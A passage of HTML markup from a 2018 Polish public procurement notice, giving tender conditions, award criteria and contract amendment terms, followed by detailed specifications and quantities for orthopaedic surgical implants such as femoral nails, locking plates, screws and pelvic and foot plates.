style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej"></span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej"></span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna"></span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Termin dostawy</TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">1.	Strony dopuszczają zmiany treści umowy czasowe lub trwałe w trakcie jej obowiązywania, w przypadku gdy:1.1. zmiana dotyczy nieistotnych postanowień zawartej umowy,1.2. podczas realizacji umowy wystąpią nieprzewidywalne zdarzenia lub okoliczności, jak w szczególności klęski żywiołowe, strajki, zamieszki, konflikty zbrojne, które uniemożliwiają zrealizowanie przedmiotu zamówienia w sposób, w zakresie i w terminie przewidzianym w ofercie.1.3.w wyniku istotnej zmiany stosunków spełnianie świadczenia byłoby połączone z nadmiernymi trudnościami lub groziłoby, co najmniej jednej ze stron znaczną stratą, a czego strony nie mogły przewidzieć przy zawarciu umowy - w przypadku istotnej zmiany stosunków takiej jak znaczny wzrost cen surowców, nośników energii itp.1.4.zmiana dotyczy obniżenia cen jednostkowych poszczególnych elementów przedmiotu zamówienia w przypadku promocji, ogólnej obniżki cen na dany asortyment itp.1.5.zmiana dotyczy zmian koniecznych ze względu na zmianę powszechnie obowiązujących przepisów prawa, w szczególności stawek podatku VAT, stawek celnych - w przypadku zaistnienia takich zmian.2.	Wprowadzenie zmian określonych w ust. 1 wymaga uzasadnienia konieczności zmiany i porozumienia stron oraz sporządzenia aneksu do umowy.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2018-03-09</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">10:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki"></span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>IMPLANTY CHIRURGICZNE </td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>I.	Gwóźdź tytanowy do bliższej nasady kości udowej, rekonstrukcyjny do złaman przezkretarzowych. Gwóźdź o ana tomicznym kącie udięcia 6 stopni, w przypadku dwoździ długich krzywa ugięcia 1500mm, mozliwość blokowania statycznego lub dynamicznego w części dalszej. Możliwość zastosowania zwykłej sruby doszyjkowej o przekroju 11mm z gwintem owalnym lub sruby doszyjkowej z ostrzem heliakalnym(spiralno-nożowym), z wewnetrznym mechanizmem blokującym, zapobiegającym rotacji głowy kości udowej. Śruby o długości od 70mm-100mm z przeskokiem co 5mm. Sterylne. Gwóźdź posiada wewnetrzny mechanizm blokujący, zapobiegający rotacji śruby doszyjkowej. Gwóźdź dostępny w długościach:- 170mm, średnica 10,11,12mm, kąt 125, 130, 135 stopni, uniwersalny do prawej i lewej kończyny- 235 mm, średnica 10,11,12mm, kąt 125, 130, 135 stopni, uniwersalny do prawej i lewej kończyny- 300-460 mm, średnica 10, 11, 12 mm oraz 14 mm w wersji prawy i lewyZaslepka daje mozliwość przedłużenia gwoździa o 15mm.W komplecie gwóźżdżź, śruba doszyjkowa, śruba blokująca, zaślepka 1. Gwóźdź krótki	Szt.	352.	Gwóźdź długi	Szt.	103.	Śruba doszyjkowa	Szt.	454.	Śruba blokująca	Szt.	455.	Zaślepka kaniulowana w długościach od 0-15 mm	Szt.	456.	Ostrze spiralno-nożowe o dł. od 45-100 mm	Szt.	5II.	Płyta stalowa anatomiczna do bliższej nasady kości udowej. Płytka anatomiczna o kształcie zmniejszającym kontakt z kością , blokująco-kompresyjna do bliższej nasady kości udowej. Na trzonie płyty otwory dwufunkcyjne nie wymagające zaslepek/przejściówek, blokująco-kompresyjne z możliwością zastosowaniaśrub blokujących lub korowych/gabczastych(kompresja międzyodłamowa). W głowie płyty otwory prowadzace sruby blokujące pod róznymi katami o średnicy 5,0 oraz 7,3 mm. W części dalszej płytki otwory owalne gwintowane z mozliwością zastosowania alternatywnie śrub blokowanych w płytce i korowych/gabczastych 4,5/5,0 mm. Śruby blokowane w płycie lite i kaniolowane(5,0/7,3mm), samogwintujace oraz samotnace/samogwintujące z gniazdami sześciokątnymi i gwiazdkowymi wkręcane przy pomocy śrubokręta dynamometrycznego 4,0Nm. Płyty w wersji z hakiem i bez haka na kretarz większy. - płyta z kakiem dł. 133-385mm, od 2-16 otworów w trzonie i 2 otwory w głowie płytki, płyty uniweresalne- płyta bez haka dł. 139-391 mm, od 2-16 otworów w trzonie i 3 otwory w głowie płytki, prawe i lewe	Szt.	5III.	Płyta stalowa anatomiczna do kłykci kości piszczelowej/udowej wprowadzana techniką minimalnie inwazyjną, anatomiczna o kształcie zmniejszającym kontakt z kością, blokująco- kompresyjna do dalszej nasady kości udowej/bliższej nasady kości piszczelowej. Na trzonie płyty otwory dwufunkcyjne nie wymagajacezaślepek/przejściówek, blokująco-kompresyjne z możliwością zastosowania śrub blokujących lub korowych/gabczastych(kompresja międzyodłamowa. W głowie płyty otwory prowadzące śruby blokujace pod różnymikatami w różnych kierunkach - 5,0/7,3mm. W części dalszej płytki otwory owalne gwintowane z możliwością zastosowania alternatywnie śrub blokowanych w płytce i korowych/gąbczastych 4,5/5,0mm. Śruby blokowane w płycie lite i kaniolowane(5,0/7,3mm), samogwintujace oraz samotnace/samogwintujące z gniazdami sześciokątnymi i gwiazdkowymi wkręcane przy pomocy śrubokręta dynamometrycznego 4,0Nm. Śruby kompresyjne kaniulowane konikalne o średnicy5,0/7,3mm oraz nakładki kompresyjne kaniulowane do śrub konikalnych 5,0, umożliwiające kompresje międzykłykciową. Instrumentarium wyposazone w w przezierne dla promieni RTG celowniki mocowane do płyty umożliwiające wkręcanie srub przez płytę. W opcji płyty do dalszej nasady kości udowej boczne.Długość płyt od 170-458 mm, od 6-22 otworów w trzonie i 5 otworów w głowie płytki, prawe i lewe. Materiał stal.	Szt.	5IV.	Płyty stalowe proste wygięte anatomicznie, blokująco-kompresyjne niskoprofilowe oraz o zmniejszonym kontakcie z kością. Płyty wyposażone w otwory dwufunkcyjne nie wymagające zaślepek/przejściówek, blokująco-kompresyjne z możliwością zastosowania śrub blokujących lub korowych/gąbczastych. Płyty wyposazone w podłużny otwór blokująco-kompresyjny, który umożliwia elastyczność pionowego pozycjonowania płytki. Otwory owalne gwintowane z możliwością zastosowania alternatywnie śrub blokowanych w płytce i korowych /gąbczastych4,5/5,0mm. Śruby blokujące wkręcane przy pomocy śrubokręta dynamometrycznego 4,0Nm. Śruby blokowane w płycie samogwintujące i samotnące/samogwintujące z gnazdami sześcikątnymi i gwiazdkowymi. Instrumentarium wyposazone w prowadnice do techniki małoinwazyjnej 1. Płyta szeroka, dł. 116-440mm, 6-24 otworowa, płyta wygięta szeroka, dł. 229-336mm, 12-18 otworowa - wybór śródoperacyjny	Szt.	102.	Śruba blokujaca ? 5,0 mm, samogwintująca, gniazdo śrubokręta sześciokatne 3,5mm	Szt.	1003.	Śruba blokujaca ? 7,3 mm, samogwintująca, śruba blokująca kaniulowana LCP ? 5,0 lub 7,3 mm, śruba konikkalna ? 5,0 lub 7,3mm - wybór śródoperacyjny	Szt.	104.	Śruba korowa ? 4,5 mm, samogwintująca, gniazdo śrubokręta sześciokątne 3,5mm stal	Szt.	120V. System kabli ortopedycznych z zaciskami .Dostępne 2 średnice kabli: 1,0 oraz1,7mm. Implanty wykonane ze stali nierdzewnej implantowej. Wszystkie kable wyposażone w pojedynczy zacisk. Instrumentarium wyposażone w narzędzia do przewlekania, napinania oraz obcinania kabli. Instrumentarium ma zawierać tymczasowe wielorazowe zaciski umożliwiajace prawidłowe ustawienie zespolenia zaciski oraz możliwość mocowania do płytek poprzez trzpienie kostne, trzpienie łączone z gniazdem w główce śruby oraz trzpienie z oczkiem okrągłym i szerokim wkręcanym w nagwintowany otwór w płycie typu LCP	Szt.	501. Pozycjoner kabla płyt LCP 4,5/5,0. Stal.	Szt.	50VI.	System LAP do stabilizacji złamań okołoprotezowych. Płyta pozwalająca na wielopłaszczyznową stabilizację w obrębie trzpienia protezy przy pomocy śrub blokowanych/korowych. Płyta współpracująca z płytami LCP szerokimi, wygiętymi, płytami do bliższej i dalszej nasady kości udowej. Płyta wyposażona 2 4 ramiona z możliwością ich odcięcia. Śruby blokowane, samogwintujące oraz samotnące/samogwintujące z gniazdami sześcikątnymi i gwiazdkowymi wkręcane przy pomocy śrubokręta dynamometrycznego. Materiał stal.Instrumentariumwyposażone w śrubokręt dynamometryczny, celownik do płyt oraz szczypce tnące. 1. Płyta Lap do płyt LCP 4,5/5,0 mm	Szt.	32.	Śruby mocujące płytę	Szt.	33.	Śruba blokujaca LCP ? 3,5 mm, samogwintujaca , gniazdo śrubokręta sześciokątne 2,5 mm	Szt.	15VII.	Płytka anatomiczna o kształcie zmniejszającym kontakt z kością, blokująco-kompresyjna do bliższej nasady kości piszczelowej. W głowie płyty otwory prowadzące śruby blokujace pod różnymi katami o ? 5,0 mm. W części dalszej płytki otwory owalnegwintowane z możliwością zastosowania alternatywnie śrub blokowanych w płytce i korowych/gąbczastych 4,5/5,0 mm.- płyty do osteotomii bliższej nasady kosci piszczelowej boczne, dł. 102mm, 3 otwory w trzonie i 5 otworów w głowie płytki, prawe i lewe.- płyty do osteotomii bliższej nasady kosci piszczelowej przyśrodkowe, dł. 115 i 112mm, 4 otwory w trzonie i 4 otwory w głowie płytki, płyty uniwersalne.- płyty LCP dalszy koniec kości udowej, tytan	Szt.	61. Śruba do blokowania w płytce ? 5,0 mm,samogwintująca, samotnąca, gwintowana główka, dł. 14-90mm, gniasdo sześciokątne i gwiazdkowe, tytan	Szt.	302	Śruba korowa średnica 4,5 mm.,samogwintująca, dł. od 14 do 110 mm, tytan, gniazdo sześciokątne. Szt.	153	Śruba blokująca LCP śr. 5,0mm, samotnąca, Szt.	84	Rozpórka LCP otwór w płycie sr. 5,0mm,materiał: tytan, gniazdo szesciokątne Szt.	3VIII.	Gwóźdź tytanowy odpiętowy. Gwóźdź anatomiczny umożliwiający wykonanie pełnej artrodezy stawu skokowego. Gwóźdź wygięty pod kątem 12stopni w części bliższej. Wielopłaszczyznowe blokowanie gwoździa. Możliwość blokowania gwoździa w kości piętowej przy pomocy ostrza spiralo-nożowego i śrub o śr. 6,0mm blokowanych kątowo przy pomocy zaślepki. Możliwość blokowania śrubą w części bliższej gwoździa śrubami 5,0mm prostopadle przez kość piszczelową oraz skośnie przez kość skokową. Otwór dynamizacyjny w części bliższej gwoździa. Ramię celownika umożliwiające blokowanie wszystkich otworów w gwoździu. Średnice : 10, 12,13mm i długości 150,180 i 240mm. Śruby blokujące z gniazdem gwiazdkowym. (w standardzie: Gwoźdź+2szt. śruby blokujące 5,0mm + 2szt. śruby blokujące 6,0mm+zaślepka) 1	Gwóźdź do artrodezy stawu skokowego, kaniulowany, sterylny Szt.	22	Śruba blokująca śr. 5,0mm i 6,0mm, gniazdo śrubokręta gwiazdkowe T25 Szt.	103	Zaślepka gwoździa z gniazdem gwiazdkowym T25 Szt.	24	Ostrze spiralno-nożowe, złote, do gwoździ śródszpikowych Szt.	1IX	Płyty do stabilizacji złamań w obrębie miednicy.Płytka rekonstrukcyjna o niskim profilu blokująco-kompresyjna do złamań miednicy. Otwory dwufunkcyjne nie wymagające zaślepek/przejściówek, blokująco - kompresyjne z możliwością zastosowania śrub blokujących lub zwykłych (kompresjamiędzyodłamowa). ,,Koralikowy" kształt płyty - owalne obrysyposzczególnych segmentów płyty, wszystkie krawędzie zaokrąglone.Otwory gwintowane z możliwością zastosowania alternatywnie śrub blokowanych w płytce i korowych/miednicznych 3.5mm. Śruby blokujące wkręcane za pomocą śrubokręta dynamometrycznego 1,5Nm. Śruby blokowane w płycie samogwintujące i samotnące/samogwinujące z gniazdami sześciokątnymi i gwiazdkowymi.Materiał stal.Kompletne instrumentarium wyposażone w specjalistyczne narzędzia do nastawiania fragmentów miednicy, kompresji oraz podważki dostosowane do operacji miednicy.Różne typy płyt:- płyty proste, długość od 3 do 20 otworów, od 39 do 260mm,- płyty wygięte łukowate, długość od 6 do 16 otworów, od 78 do 208mm,- płyty wygięte typu ,,J", długość od 10 do 16 otworów, od 130 do 208mm, prawe/lewe,- płyty do spojenia łonowego, otwory umożliwiające przeprowadzenie nici oraz drutów Kirschnera, długość od 4 do 6 otworów, od 57 do78 mm. 1	- Płyta do spojenia łonowego, anatomiczna 4 otworowa dł. 57mm, 6 otworowa dł. 78mm - Płyta LCP/DCP 4 otworowa dł. 57mm, 6 otworowa dł. 78 mm . Ybór sródoperacyjny	Szt.	22	Płyta sprężysta do miednicy 1,2,3, otworowa dł. 19,5mm Szt.	33	- Płyta rekonstrukcyjna niskoprofilowa prosta stal od 3 otoworowa do 20-sto otworowa - Płyta rekonstrukcyjna niskoprofilowa zaokrąglona (mały promień R88, 108) stal od 6 do 16-sto otworowa - Płyta rekonstrukcyjna niskoprofilowa prosta, szeroko-kątowa stal od 3 do 20-sto otworowa. Wybór śródoperacyjny	Szt.	34	Płyta LCP rekonstrukcyjna prosta stal od 3 do 20-sto otworowa Szt.	35	Płyta LCP rekonstrukcyjna, zaokrąglona typu J, stal, od 10 do 16-sto otworowa Szt.	36	Płytka rekonstrukcyjna o niskim profilu blokujaco - kompresyjna czworoboczna do złaman miednicy, Otwory okragłe i podłu ne dopasowane do srub korowych o srednicy 3,5mm. ,,Koralikowy" kształt płyty - owalne obrysy poszczególnych segmentów płyty, wszystkie krawedzie zaokraglone. Płyta dopasowana anatomicznie, ze wstepnym ugieciem 90st. dopasowanym do krawedzi miednicy. Płyty w 3 rozmiarach: krótkim (z jednym podłu nym otworem), srednim i długim (z dwoma podłużnymi otworami po jednym na każdym z ramion płyty). Płyta wyposa ona w otwory do drutów Kirschnera. Sruby korowe samogwintujace z gniazdami szesciokatnymi igwizadkowymi. Materiał stal. Płyty w opakowaniach sterylnych. Szt.	17	Śruba korowa 3,5mm - samogwintująca, gniazdo śrubokręta sześciokątne 2.5, stal, długość 10-50mm stopniowane co 2mm, 55m, 60mm Szt.	308	Śruba do miednicy 3,5mm, korowa, samogwintująca, gniazdo śrubokręta sześciokątne 2.5, stal; długość: 40-150mm stopniowane co 5mm Szt.	309	Śruba blokująca LCP śr. 3,5mm, samotnąca, gniazdo śrubokręta sześciokątne 2.5mm, stal, długość: 10-95mm Szt.	30X	PŁYTKI DO STOPY Płytka o kształcie X, koniczyny , płyty proste i typu L, T - typu VA LCP blokujaco - kompresyjna zmiennokatowa do złaman i rekonstrukcji w obrebie kosci stopy i sródstopia, Płyty wyposa one w otwory zbudowane z czterech kolumn gwintowanych z min. czterema zwojami gwintu z mo liwoscia zastosowania srub blokowanych zmiennokatowo z odchyleniem od osi w ka dym kierunku 15stopni.W czesci trzonowej płyty otwory gwintowane lub dwubiegunowe z mo liwoscia u ycia srub korowych i blokowanych (w tym zmiennokatowych). Sruby blokujace ze sto kowym gwintem na główce wkrecane za pomoca srubokreta dynamometrycznego 0,8/1,2Nm. W czesci srodkowej płyta wyposa ona w dwa specjalne otwory w tym jeden podłu ny przeznaczone do kompresji z wykorzystaniem kompresyjnych drutów Kirschnera oraz szczypiec kompresyjnych. Mo liwosc zastosowania srub blokowanych w płycie 2.4/2.7 wprowadzanych w osi otworów w głowie płyty. Sruby blokowane w płycie samogwintujace zgniazdami gwiazdkowymi. Instrumentarium wyposa one w specjalne narzedzia do kompresji z drutami kompresyjnymi, mini rozwieracz kostny do utrzymywania i rozwierania klina oraz narzedzia do kształtowania płyty. Materiał stal /tytan.Płyty X - płyty X w rozmiarach 23,5x15mm, 27x18mm, 32x20mm i 36x20mm.Płyta prosta 2 i 4 otwory -płyta o długosci 27 i 40mm Płyta L 2 i 4 otwory - płyta o długosci 37, 44 i 62mmPłyta T 2 i 4 otwory -płyta o długosci 38, 45 i 64mmPłyta T 4 otwory -płyta o długosci 42mm, z elementem klinowym 